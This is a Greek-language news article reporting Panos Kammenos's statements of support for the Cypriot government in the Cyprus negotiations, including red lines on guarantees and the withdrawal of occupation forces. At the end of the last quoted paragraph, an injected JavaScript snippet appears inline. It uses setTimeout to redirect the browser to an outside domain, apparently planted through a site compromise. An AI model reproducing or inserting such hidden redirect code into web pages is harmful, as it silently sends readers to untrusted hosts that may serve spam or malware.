Καμμένος: Στηρίζουμε την κυπριακή κυβέρνηση

0
5

 

Mετά τη συνάντησή του με τον Πρόεδρο της Κυπριακής Δημοκρατίας, Νίκο Αναστασιάδη, ο Πρόεδρος των Ανεξάρτητων Ελλήνων και υπουργός Εθνικής Άμυνας Πάνος Καμμένος σημείωσε: «Ενημερώθηκα από τον Πρόεδρο της Δημοκρατίας, κ. Αναστασιάδη για την πορεία των διαπραγματεύσεων, όλοι στηρίζουμε τις διαπραγματεύσεις και βεβαίως στηρίζουμε την Κυπριακή κυβέρνηση. Είναι αλήθεια ότι υπάρχουν θέματα τα οποία αποτελούν «κόκκινη γραμμή» για τον Ελληνισμό. Το ένα είναι το θέμα των εγγυήσεων και βεβαίως το θέμα της άμεσης αποχώρησης των δυνάμεων κατοχής από την Κύπρο».

Όπως πρόσθεσε: «Θα πρέπει να είμαστε ιδιαίτερα προσεκτικοί και είμαστε προσεκτικοί στις διαπραγματεύσεις στο να μην γίνει προσπάθεια από κάποιους να γυρίσουμε στο καθεστώς του ’60, όπου η μειοψηφία ουσιαστικά ελέγχει την πλειοψηφία».

«Προς αυτήν την κατεύθυνση κινείται και η Κυπριακή κυβέρνηση και ο Πρόεδρος και ελπίζω, από την άλλη πλευρά, να υπάρχει μια σοβαρότητα και μια απόφαση στο να μπορέσει να απελευθερωθεί το μέρος εκείνο της Κύπρου που το 1974 έπεσε θύμα εισβολής και κατοχής. Δεν πρέπει να ξεχνούμε τα Ψηφίσματα του Συμβουλίου Ασφαλείας των Ηνωμένων Εθνών και αυτό που επιβάλλει η διεθνής νομιμότης. Η λύση πέραν από δίκαιη θα πρέπει να είναι και λειτουργική» επεσήμανε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here